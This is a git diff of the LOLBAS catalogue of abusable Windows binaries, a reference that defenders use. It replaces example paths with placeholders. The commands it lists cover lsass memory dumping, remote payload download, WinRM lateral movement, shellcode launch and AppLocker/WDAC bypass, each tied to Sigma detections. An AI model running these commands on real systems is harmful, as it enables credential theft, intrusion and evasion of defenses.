https://github.com/SigmaHQ/sigma/blob/0.21-688-gd172b136b/rules/windows/process_creation/proc_creation_win_lolbas_utilityfunctions.yml Resources: diff --git a/yml/OSScripts/Winrm.yml b/yml/OSScripts/Winrm.yml index 7e375cc..9ceb622 100644 --- a/yml/OSScripts/Winrm.yml +++ b/yml/OSScripts/Winrm.yml @@ -1,10 +1,10 @@ --- Name: winrm.vbs Description: Script used for manage Windows RM settings -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: 'winrm invoke Create wmicimv2/Win32_Process @{CommandLine="notepad.exe"} -r:http://target:5985' + - Command: 'winrm invoke Create wmicimv2/Win32_Process @{CommandLine="{CMD}"} -r:http://target:5985' Description: Lateral movement/Remote Command Execution via WMI Win32_Process class over the WinRM protocol Usecase: Proxy execution Category: Execute @@ -14,7 +14,7 @@ Commands: Tags: - Execute: CMD - Execute: Remote - - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="cmd.exe /k c:\windows\system32\notepad.exe"} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985' + - Command: 'winrm invoke Create wmicimv2/Win32_Service @{Name="Evil";DisplayName="Evil";PathName="{CMD}"} -r:http://acmedc:5985 && winrm invoke StartService wmicimv2/Win32_Service?Name=Evil -r:http://acmedc:5985' Description: Lateral movement/Remote Command Execution via WMI Win32_Service class over the WinRM protocol Usecase: Proxy execution Category: Execute diff --git a/yml/OSScripts/pester.yml b/yml/OSScripts/pester.yml index c8b1d9f..53f768c 100644 --- a/yml/OSScripts/pester.yml +++ b/yml/OSScripts/pester.yml @@ -1,11 +1,11 @@ --- Name: Pester.bat Description: Used as part of the Powershell pester -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: Pester.bat [/help|?|-?|/?] "$null; notepad" - Description: Execute code using Pester. The third parameter can be anything. The fourth is the payload. Example here executes notepad + - Command: Pester.bat [/help|?|-?|/?] "$null; {CMD}" + Description: Execute code using Pester. The third parameter can be anything. The fourth is the payload. Usecase: Proxy execution Category: Execute Privileges: User @@ -13,8 +13,8 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: EXE - - Command: Pester.bat ;calc.exe - Description: Execute code using Pester. Example here executes calc.exe + - Command: Pester.bat ;{PATH:.exe} + Description: Execute code using Pester. Example here executes specified executable. Usecase: Proxy execution Category: Execute Privileges: User @@ -23,9 +23,7 @@ Commands: Tags: - Execute: EXE Full_Path: - - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\\bin\Pester.bat -Code_Sample: - - Code: + - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\\bin\Pester.bat Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_pester_1.yml Resources: diff --git a/yml/OtherMSBinaries/AccCheckConsole.yml b/yml/OtherMSBinaries/AccCheckConsole.yml index 23154c1..637581a 100644 --- a/yml/OtherMSBinaries/AccCheckConsole.yml +++ b/yml/OtherMSBinaries/AccCheckConsole.yml @@ -1,10 +1,10 @@ --- Name: AccCheckConsole.exe Description: Verifies UI accessibility requirements -Author: 'bohops' +Author: bohops Created: 2022-01-02 Commands: - - Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll + - Command: AccCheckConsole.exe -window "Untitled - Notepad" {PATH_ABSOLUTE:.dll} Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name. Usecase: Local execution of managed code from assembly DLL. Category: Execute @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows Tags: - Execute: DLL (.NET) - - Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll + - Command: AccCheckConsole.exe -window "Untitled - Notepad" {PATH_ABSOLUTE:.dll} Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name. Usecase: Local execution of managed code to bypass AppLocker. Category: AWL Bypass diff --git a/yml/OtherMSBinaries/Adplus.yml b/yml/OtherMSBinaries/Adplus.yml index 142ad7a..f7212b0 100644 --- a/yml/OtherMSBinaries/Adplus.yml +++ b/yml/OtherMSBinaries/Adplus.yml @@ -4,14 +4,14 @@ Description: Debugging tool included with Windows Debugging Tools Author: mr.d0x Created: 2021-09-01 Commands: - - Command: adplus.exe -hang -pn lsass.exe -o c:\users\mr.d0x\output\folder -quiet + - Command: adplus.exe -hang -pn lsass.exe -o {PATH_ABSOLUTE:folder} -quiet Description: Creates a memory dump of the lsass process Usecase: Create memory dump and parse it offline Category: Dump Privileges: SYSTEM MitreID: T1003.001 OperatingSystem: All Windows - - Command: adplus.exe -c config-adplus.xml + - Command: adplus.exe -c {PATH:.xml} Description: Execute arbitrary commands using adplus config file (see Resources section for a sample file). Usecase: Run commands under a trusted Microsoft signed binary Category: Execute @@ -20,14 +20,14 @@ Commands: OperatingSystem: All Windows Tags: - Execute: CMD - - Command: adplus.exe -c config-adplus.xml + - Command: adplus.exe -c {PATH:.xml} Description: Dump process memory using adplus config file (see Resources section for a sample file). Usecase: Run commands under a trusted Microsoft signed binary Category: Dump Privileges: SYSTEM MitreID: T1003.001 OperatingSystem: All Windows - - Command: adplus.exe -crash -o "C:\temp\" -sc calc.exe + - Command: adplus.exe -crash -o "{PATH_ABSOLUTE:folder}" -sc {PATH:.exe} Description: Execute arbitrary commands and binaries from the context of adplus. Note that providing an output directory via '-o' is required. Usecase: Run commands under a trusted Microsoft signed binary Category: Execute diff --git a/yml/OtherMSBinaries/Agentexecutor.yml b/yml/OtherMSBinaries/Agentexecutor.yml index 5e95bac..65523d2 100644 --- a/yml/OtherMSBinaries/Agentexecutor.yml +++ b/yml/OtherMSBinaries/Agentexecutor.yml @@ -1,10 +1,10 @@ --- Name: AgentExecutor.exe Description: Intune Management Extension included on Intune Managed Devices -Author: 'Eleftherios Panos' +Author: Eleftherios Panos Created: 2020-07-23 Commands: - - Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\Windows\SysWOW64\WindowsPowerShell\v1.0" 0 1 + - Command: AgentExecutor.exe -powershell "{PATH_ABSOLUTE:.ps1}" "{PATH_ABSOLUTE:.1.log}" "{PATH_ABSOLUTE:.2.log}" "{PATH_ABSOLUTE:.3.log}" 60000 "C:\Windows\SysWOW64\WindowsPowerShell\v1.0" 0 1 Description: Spawns powershell.exe and executes a provided powershell script with ExecutionPolicy Bypass argument Usecase: Execute unsigned powershell scripts Category: Execute @@ -13,8 +13,8 @@ Commands: OperatingSystem: Windows 10 Tags: - Execute: PowerShell - - Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1 - Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully + - Command: AgentExecutor.exe -powershell "{PATH_ABSOLUTE:.ps1}" "{PATH_ABSOLUTE:.1.log}" "{PATH_ABSOLUTE:.2.log}" "{PATH_ABSOLUTE:.3.log}" 60000 "{PATH_ABSOLUTE:folder}" 0 1 + Description: If we place a binary named powershell.exe in the specified folder path, agentexecutor.exe will execute it successfully Usecase: Execute a provided EXE Category: Execute Privileges: User @@ -24,8 +24,6 @@ Commands: - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Microsoft Intune Management Extension\AgentExecutor.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml diff --git a/yml/OtherMSBinaries/Appcert.yml b/yml/OtherMSBinaries/Appcert.yml index a423ff3..2fee1e5 100644 --- a/yml/OtherMSBinaries/Appcert.yml +++ b/yml/OtherMSBinaries/Appcert.yml @@ -4,7 +4,7 @@ Description: Windows App Certification Kit command-line tool. Author: Avihay Eldad Created: 2024-03-06 Commands: - - Command: appcert.exe test -apptype desktop -setuppath c:\windows\system32\notepad.exe -reportoutputpath c:\users\public\output.xml + - Command: appcert.exe test -apptype desktop -setuppath {PATH_ABSOLUTE:.exe} -reportoutputpath {PATH_ABSOLUTE:.xml} Description: Execute an executable file via the Windows App Certification Kit command-line tool. Usecase: Performs execution of specified file, can be used as a defense evasion Category: Execute @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows Tags: - Execute: EXE - - Command: appcert.exe test -apptype desktop -setuppath c:\users\public\malicious.msi -setupcommandline /q -reportoutputpath c:\users\public\output.xml + - Command: appcert.exe test -apptype desktop -setuppath {PATH_ABSOLUTE:.msi} -setupcommandline /q -reportoutputpath {PATH_ABSOLUTE:.xml} Description: Install an MSI file via an msiexec instance spawned via appcert.exe as parent process. Usecase: Execute custom made MSI file with malicious code Category: Execute diff --git a/yml/OtherMSBinaries/Appvlp.yml b/yml/OtherMSBinaries/Appvlp.yml index 620916d..94df70a 100644 --- a/yml/OtherMSBinaries/Appvlp.yml +++ b/yml/OtherMSBinaries/Appvlp.yml @@ -1,28 +1,19 @@ --- Name: Appvlp.exe Description: Application Virtualization Utility Included with Microsoft Office 2016 -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: AppVLP.exe \\webdav\calc.bat + - Command: AppVLP.exe {PATH_SMB:.bat} Usecase: Execution of BAT file hosted on Webdav server. - Description: Executes calc.bat through AppVLP.exe + Description: Executes .bat file through AppVLP.exe Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 10 w/Office 2016 Tags: - Execute: CMD - - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)" - Usecase: Local execution of process bypassing Attack Surface Reduction (ASR). - Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command. - Category: Execute - Privileges: User - MitreID: T1218 - OperatingSystem: Windows 10 w/Office 2016 - Tags: - - Execute: EXE - - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')" + - Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('{PATH:.exe}','', '', 'open', 1)" Usecase: Local execution of process bypassing Attack Surface Reduction (ASR). Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command. Category: Execute diff --git a/yml/OtherMSBinaries/Bginfo.yml b/yml/OtherMSBinaries/Bginfo.yml index c61401a..454d7d9 100644 --- a/yml/OtherMSBinaries/Bginfo.yml +++ b/yml/OtherMSBinaries/Bginfo.yml @@ -1,11 +1,11 @@ --- Name: Bginfo.exe Description: Background Information Utility included with SysInternals Suite -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: bginfo.exe bginfo.bgi /popup /nolicprompt - Description: Execute VBscript code that is referenced within the bginfo.bgi file. + - Command: bginfo.exe {PATH:.bgi} /popup /nolicprompt + Description: Execute VBscript code that is referenced within the specified .bgi file. Usecase: Local execution of VBScript Category: Execute Privileges: User @@ -13,8 +13,8 @@ Commands: OperatingSystem: Windows Tags: - Execute: WSH - - Command: bginfo.exe bginfo.bgi /popup /nolicprompt - Description: Execute VBscript code that is referenced within the bginfo.bgi file. + - Command: bginfo.exe {PATH:.bgi} /popup /nolicprompt + Description: Execute VBscript code that is referenced within the specified .bgi file. Usecase: Local execution of VBScript Category: AWL Bypass Privileges: User @@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows Tags: - Execute: WSH - - Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt + - Command: \\10.10.10.10\webdav\bginfo.exe {PATH:.bgi} /popup /nolicprompt Usecase: Remote execution of VBScript Description: Execute bginfo.exe from a WebDAV server. Category: Execute @@ -31,7 +31,7 @@ Commands: Tags: - Execute: WSH OperatingSystem: Windows - - Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt + - Command: \\10.10.10.10\webdav\bginfo.exe {PATH:.bgi} /popup /nolicprompt Usecase: Remote execution of VBScript Description: Execute bginfo.exe from a WebDAV server. Category: AWL Bypass @@ -40,7 +40,7 @@ Commands: OperatingSystem: Windows Tags: - Execute: WSH - - Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt + - Command: \\live.sysinternals.com\Tools\bginfo.exe {PATH_SMB:.bgi} /popup /nolicprompt Usecase: Remote execution of VBScript Description: This style of execution may not longer work due to patch. Category: Execute @@ -50,7 +50,7 @@ Commands: Tags: - Execute: WSH - Execute: Remote - - Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt + - Command: \\live.sysinternals.com\Tools\bginfo.exe {PATH_SMB:.bgi} /popup /nolicprompt Usecase: Remote execution of VBScript Description: This style of execution may not longer work due to patch. Category: AWL Bypass diff --git a/yml/OtherMSBinaries/Cdb.yml b/yml/OtherMSBinaries/Cdb.yml index 87aa504..e5c9f38 100644 --- a/yml/OtherMSBinaries/Cdb.yml +++ b/yml/OtherMSBinaries/Cdb.yml @@ -4,8 +4,8 @@ Description: Debugging tool included with Windows Debugging Tools. Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: cdb.exe -cf x64_calc.wds -o notepad.exe - Description: Launch 64-bit shellcode from the x64_calc.wds file using cdb.exe. + - Command: cdb.exe -cf {PATH:.wds} -o notepad.exe + Description: Launch 64-bit shellcode from the specified .wds file using cdb.exe. Usecase: Local execution of assembly shellcode. Category: Execute Privileges: User @@ -14,8 +14,8 @@ Commands: Tags: - Execute: Shellcode - Command: | - cdb.exe -pd -pn - .shell + cdb.exe -pd -pn {process_name} + .shell {CMD} Description: Attaching to any process and executing shell commands. Usecase: Run a shell command under a trusted Microsoft signed binary Category: Execute @@ -24,7 +24,7 @@ Commands: OperatingSystem: Windows Tags: - Execute: CMD - - Command: cdb.exe -c C:\debug-script.txt calc + - Command: cdb.exe -c {PATH:.txt} "{CMD}" Description: Execute arbitrary commands and binaries using a debugging script (see Resources section for a sample file). Usecase: Run commands under a trusted Microsoft signed binary Category: Execute diff --git a/yml/OtherMSBinaries/Coregen.yml b/yml/OtherMSBinaries/Coregen.yml index 7bbacc2..07b5b28 100644 --- a/yml/OtherMSBinaries/Coregen.yml +++ b/yml/OtherMSBinaries/Coregen.yml @@ -4,7 +4,7 @@ Description: Binary coregen.exe (Microsoft CoreCLR Native Image Generator) loads Author: Martin Sohn Christensen Created: 2020-10-09 Commands: - - Command: coregen.exe /L C:\folder\evil.dll dummy_assembly_name + - Command: coregen.exe /L {PATH_ABSOLUTE:.dll} dummy_assembly_name Description: Loads the target .DLL in arbitrary path specified with /L. Usecase: Execute DLL code Category: Execute @@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows Tags: - Execute: DLL - - Command: coregen.exe /L C:\folder\evil.dll dummy_assembly_name + - Command: coregen.exe /L {PATH_ABSOLUTE:.dll} dummy_assembly_name Description: Loads the target .DLL in arbitrary path specified with /L. Since binary is signed it can also be used to bypass application whitelisting solutions. Usecase: Execute DLL code Category: AWL Bypass @@ -34,8 +34,6 @@ Commands: Full_Path: - Path: C:\Program Files\Microsoft Silverlight\5.1.50918.0\coregen.exe - Path: C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\coregen.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/image_load/image_load_side_load_coregen.yml - IOC: coregen.exe loading .dll file not in "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\" diff --git a/yml/OtherMSBinaries/Createdump.yml b/yml/OtherMSBinaries/Createdump.yml index 8498c5b..9b35f53 100644 --- a/yml/OtherMSBinaries/Createdump.yml +++ b/yml/OtherMSBinaries/Createdump.yml @@ -4,7 +4,7 @@ Description: Microsoft .NET Runtime Crash Dump Generator (included in .NET Core) Author: mr.d0x, Daniel Santos Created: 2022-01-20 Commands: - - Command: createdump.exe -n -f dump.dmp [PID] + - Command: createdump.exe -n -f {PATH:.dmp} {PID} Description: Dump process by PID and create a minidump file. If "-f dump.dmp" is not specified, the file is created as '%TEMP%\dump.%p.dmp' where %p is the PID of the target process. Usecase: Dump process memory contents using PID. Category: Dump diff --git a/yml/OtherMSBinaries/Csi.yml b/yml/OtherMSBinaries/Csi.yml index 2a15866..9eb534b 100644 --- a/yml/OtherMSBinaries/Csi.yml +++ b/yml/OtherMSBinaries/Csi.yml @@ -1,10 +1,10 @@ --- Name: csi.exe Description: Command line interface included with Visual Studio. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: csi.exe file + - Command: csi.exe {PATH:.cs} Description: Use csi.exe to run unsigned C# code. Usecase: Local execution of unsigned C# code. Category: Execute @@ -16,8 +16,6 @@ Commands: Full_Path: - Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe - Path: c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_csi_use_of_csharp_console.yml diff --git a/yml/OtherMSBinaries/DefaultPack.yml b/yml/OtherMSBinaries/DefaultPack.yml index a72e4b6..23c5bca 100644 --- a/yml/OtherMSBinaries/DefaultPack.yml +++ b/yml/OtherMSBinaries/DefaultPack.yml @@ -1,10 +1,10 @@ --- Name: DefaultPack.EXE -Description: This binary can be downloaded along side multiple software downloads on the microsoft website. It gets downloaded when the user forgets to uncheck the option to set Bing as the default search provider. +Description: This binary can be downloaded along side multiple software downloads on the Microsoft website. It gets downloaded when the user forgets to uncheck the option to set Bing as the default search provider. Author: '@checkymander' Created: 2020-10-01 Commands: - - Command: DefaultPack.EXE /C:"process.exe args" + - Command: DefaultPack.EXE /C:"{CMD}" Description: Use DefaultPack.EXE to execute arbitrary binaries, with added argument support. Usecase: Can be used to execute stagers, binaries, and other malicious commands. Category: Execute @@ -15,8 +15,6 @@ Commands: - Execute: CMD Full_Path: - Path: C:\Program Files (x86)\Microsoft\DefaultPack\DefaultPack.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_lolbin_defaultpack.yml - IOC: DefaultPack.EXE spawned an unknown process diff --git a/yml/OtherMSBinaries/Devinit.yml b/yml/OtherMSBinaries/Devinit.yml index e02a700..d73159b 100644 --- a/yml/OtherMSBinaries/Devinit.yml +++ b/yml/OtherMSBinaries/Devinit.yml @@ -4,7 +4,7 @@ Description: Visual Studio 2019 tool Author: mr.d0x Created: 2022-01-20 Commands: - - Command: devinit.exe run -t msi-install -i https://example.com/out.msi + - Command: devinit.exe run -t msi-install -i {REMOTEURL:.msi} Description: Downloads an MSI file to C:\Windows\Installer and then installs it. Usecase: Executes code from a (remote) MSI file. Category: Execute diff --git a/yml/OtherMSBinaries/Devtoolslauncher.yml b/yml/OtherMSBinaries/Devtoolslauncher.yml index f6f9eea..ded9944 100644 --- a/yml/OtherMSBinaries/Devtoolslauncher.yml +++ b/yml/OtherMSBinaries/Devtoolslauncher.yml @@ -1,10 +1,10 @@ --- Name: Devtoolslauncher.exe Description: Binary will execute specified binary. Part of VS/VScode installation. -Author: 'felamos' +Author: felamos Created: 2019-10-04 Commands: - - Command: devtoolslauncher.exe LaunchForDeploy [PATH_TO_BIN] "argument here" test + - Command: devtoolslauncher.exe LaunchForDeploy {PATH_ABSOLUTE:.exe} "{CMD:args}" test Description: The above binary will execute other binary. Usecase: Execute any binary with given arguments and it will call developertoolssvc.exe. developertoolssvc is actually executing the binary. Category: Execute @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows 7 and up with VS/VScode installed Tags: - Execute: CMD - - Command: devtoolslauncher.exe LaunchForDebug [PATH_TO_BIN] "argument here" test + - Command: devtoolslauncher.exe LaunchForDebug {PATH_ABSOLUTE:.exe} "{CMD:args}" test Description: The above binary will execute other binary. Usecase: Execute any binary with given arguments. Category: Execute @@ -24,8 +24,6 @@ Commands: - Execute: CMD Full_Path: - Path: 'c:\windows\system32\devtoolslauncher.exe' -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml - IOC: DeveloperToolsSvc.exe spawned an unknown process diff --git a/yml/OtherMSBinaries/Dnx.yml b/yml/OtherMSBinaries/Dnx.yml index f54457e..b8c947b 100644 --- a/yml/OtherMSBinaries/Dnx.yml +++ b/yml/OtherMSBinaries/Dnx.yml @@ -1,11 +1,11 @@ --- Name: dnx.exe -Description: .Net Execution environment file included with .Net. -Author: 'Oddvar Moe' +Description: .NET Execution environment file included with .NET. +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: dnx.exe consoleapp - Description: Execute C# code located in the consoleapp folder via 'Program.cs' and 'Project.json' (Note - Requires dependencies) + - Command: dnx.exe {PATH_ABSOLUTE:folder} + Description: Execute C# code located in the specified folder via 'Program.cs' and 'Project.json' (Note - Requires dependencies) Usecase: Local execution of C# project stored in consoleapp folder. Category: Execute Privileges: User @@ -15,8 +15,6 @@ Commands: - Execute: CSharp Full_Path: - Path: no default -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_dnx.yml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml diff --git a/yml/OtherMSBinaries/Dotnet.yml b/yml/OtherMSBinaries/Dotnet.yml index 16b369e..8f7c7b1 100644 --- a/yml/OtherMSBinaries/Dotnet.yml +++ b/yml/OtherMSBinaries/Dotnet.yml @@ -1,11 +1,11 @@ --- Name: Dotnet.exe Description: dotnet.exe comes with .NET Framework -Author: 'felamos' +Author: felamos Created: 2019-11-12 Commands: - - Command: dotnet.exe [PATH_TO_DLL] - Description: dotnet.exe will execute any dll even if applocker is enabled. + - Command: dotnet.exe {PATH:.dll} + Description: dotnet.exe will execute any DLL even if applocker is enabled. Usecase: Execute code bypassing AWL Category: AWL Bypass Privileges: User @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows 7 and up with .NET installed Tags: - Execute: DLL (.NET) - - Command: dotnet.exe [PATH_TO_DLL] + - Command: dotnet.exe {PATH:.dll} Description: dotnet.exe will execute any DLL. Usecase: Execute DLL Category: Execute @@ -31,7 +31,7 @@ Commands: OperatingSystem: Windows 10 and up with .NET SDK installed Tags: - Execute: FSharp - - Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ] + - Command: dotnet.exe msbuild {PATH:.csproj} Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code Usecase: Execute code bypassing AWL Category: AWL Bypass diff --git a/yml/OtherMSBinaries/Dsdbutil.yml b/yml/OtherMSBinaries/Dsdbutil.yml index 65f5f18..0507c87 100644 --- a/yml/OtherMSBinaries/Dsdbutil.yml +++ b/yml/OtherMSBinaries/Dsdbutil.yml @@ -44,8 +44,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\dsdbutil.exe - Path: C:\Windows\SysWOW64\dsdbutil.exe -Code_Sample: - - Code: Detection: - IOC: Event ID 4688 - IOC: dsdbutil.exe process creation diff --git a/yml/OtherMSBinaries/Dtutil.yml b/yml/OtherMSBinaries/Dtutil.yml index b1b85a3..6cbe4ff 100644 --- a/yml/OtherMSBinaries/Dtutil.yml +++ b/yml/OtherMSBinaries/Dtutil.yml @@ -4,7 +4,7 @@ Description: Microsoft command line utility used to manage SQL Server Integratio Author: Avihay Eldad Created: 2024-06-17 Commands: - - Command: dtutil.exe /FILE C:\Windows\System32\calc.exe /COPY FILE;C:\Users\Public\calc.exe + - Command: dtutil.exe /FILE {PATH_ABSOLUTE:.source.ext} /COPY FILE;{PATH_ABSOLUTE:.dest.ext} Description: Copy file from source to destination Usecase: Use to copies the source file to the destination file Category: Copy diff --git a/yml/OtherMSBinaries/Dump64.yml b/yml/OtherMSBinaries/Dump64.yml index 065c30b..96bd0d8 100644 --- a/yml/OtherMSBinaries/Dump64.yml +++ b/yml/OtherMSBinaries/Dump64.yml @@ -4,7 +4,7 @@ Description: Memory dump tool that comes with Microsoft Visual Studio Author: mr.d0x Created: 2021-11-16 Commands: - - Command: dump64.exe out.dmp + - Command: dump64.exe {PID} out.dmp Description: Creates a memory dump of the LSASS process. Usecase: Create memory dump and parse it offline to retrieve credentials. Category: Dump diff --git a/yml/OtherMSBinaries/DumpMinitool.yml b/yml/OtherMSBinaries/DumpMinitool.yml index 0869139..48ae469 100644 --- a/yml/OtherMSBinaries/DumpMinitool.yml +++ b/yml/OtherMSBinaries/DumpMinitool.yml @@ -4,7 +4,7 @@ Description: Dump tool part Visual Studio 2022 Author: mr.d0x Created: 2022-01-20 Commands: - - Command: DumpMinitool.exe --file c:\users\mr.d0x\dump.txt --processId 1132 --dumpType Full + - Command: DumpMinitool.exe --file {PATH_ABSOLUTE} --processId 1132 --dumpType Full Description: Creates a memory dump of the lsass process Usecase: Create memory dump and parse it offline Category: Dump diff --git a/yml/OtherMSBinaries/Dxcap.yml b/yml/OtherMSBinaries/Dxcap.yml index 05ac2aa..a9b6b2d 100644 --- a/yml/OtherMSBinaries/Dxcap.yml +++ b/yml/OtherMSBinaries/Dxcap.yml @@ -1,11 +1,11 @@ --- Name: Dxcap.exe Description: DirectX diagnostics/debugger included with Visual Studio. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: Dxcap.exe -c C:\Windows\System32\notepad.exe - Description: 'Launch notepad.exe as a subprocess of dxcap.exe. Note that you should have write permissions in the current working directory for the command to succeed; alternatively, add ''-file c:\path\to\writable\location.ext'' as first argument.' + - Command: Dxcap.exe -c {PATH_ABSOLUTE:.exe} + Description: 'Launch specified executable as a subprocess of dxcap.exe. Note that you should have write permissions in the current working directory for the command to succeed; alternatively, add ''-file c:\path\to\writable\location.ext'' as first argument.' Usecase: Local execution of a process as a subprocess of dxcap.exe Category: Execute Privileges: User diff --git a/yml/OtherMSBinaries/Excel.yml b/yml/OtherMSBinaries/Excel.yml index b89523a..cac0146 100644 --- a/yml/OtherMSBinaries/Excel.yml +++ b/yml/OtherMSBinaries/Excel.yml @@ -4,7 +4,7 @@ Description: Microsoft Office binary Author: 'Reegun J (OCBC Bank)' Created: 2019-07-19 Commands: - - Command: Excel.exe http://192.168.1.10/TeamsAddinLoader.dll + - Command: Excel.exe {REMOTEURL} Description: Downloads payload from remote server Usecase: It will download a remote payload and place it in INetCache. Category: Download @@ -29,8 +29,6 @@ Full_Path: - Path: C:\Program Files (x86)\Microsoft Office\Office12\Excel.exe - Path: C:\Program Files\Microsoft Office\Office12\Excel.exe - Path: C:\Program Files\Microsoft Office\Office12\Excel.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_office.yml - IOC: Suspicious Office application Internet/network traffic diff --git a/yml/OtherMSBinaries/Fsi.yml b/yml/OtherMSBinaries/Fsi.yml index 6058ea5..73161ba 100644 --- a/yml/OtherMSBinaries/Fsi.yml +++ b/yml/OtherMSBinaries/Fsi.yml @@ -4,7 +4,7 @@ Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotN Author: Jimmy (@bohops) Created: 2021-09-26 Commands: - - Command: fsi.exe c:\path\to\test.fsscript + - Command: fsi.exe {PATH:.fsscript} Description: Execute F# code via script file Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies Category: AWL Bypass diff --git a/yml/OtherMSBinaries/FsiAnyCpu.yml b/yml/OtherMSBinaries/FsiAnyCpu.yml index 4241cbe..e3efbed 100644 --- a/yml/OtherMSBinaries/FsiAnyCpu.yml +++ b/yml/OtherMSBinaries/FsiAnyCpu.yml @@ -4,7 +4,7 @@ Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio. Author: Jimmy (@bohops) Created: 2021-09-26 Commands: - - Command: fsianycpu.exe c:\path\to\test.fsscript + - Command: fsianycpu.exe {PATH:.fsscript} Description: Execute F# code via script file Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies Category: AWL Bypass diff --git a/yml/OtherMSBinaries/Mftrace.yml b/yml/OtherMSBinaries/Mftrace.yml index c564efa..8839826 100644 --- a/yml/OtherMSBinaries/Mftrace.yml +++ b/yml/OtherMSBinaries/Mftrace.yml @@ -1,11 +1,11 @@ --- Name: Mftrace.exe Description: Trace log generation tool for Media Foundation Tools. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: Mftrace.exe cmd.exe - Description: Launch cmd.exe as a subprocess of Mftrace.exe. + - Command: Mftrace.exe {PATH:.exe} + Description: Launch specified 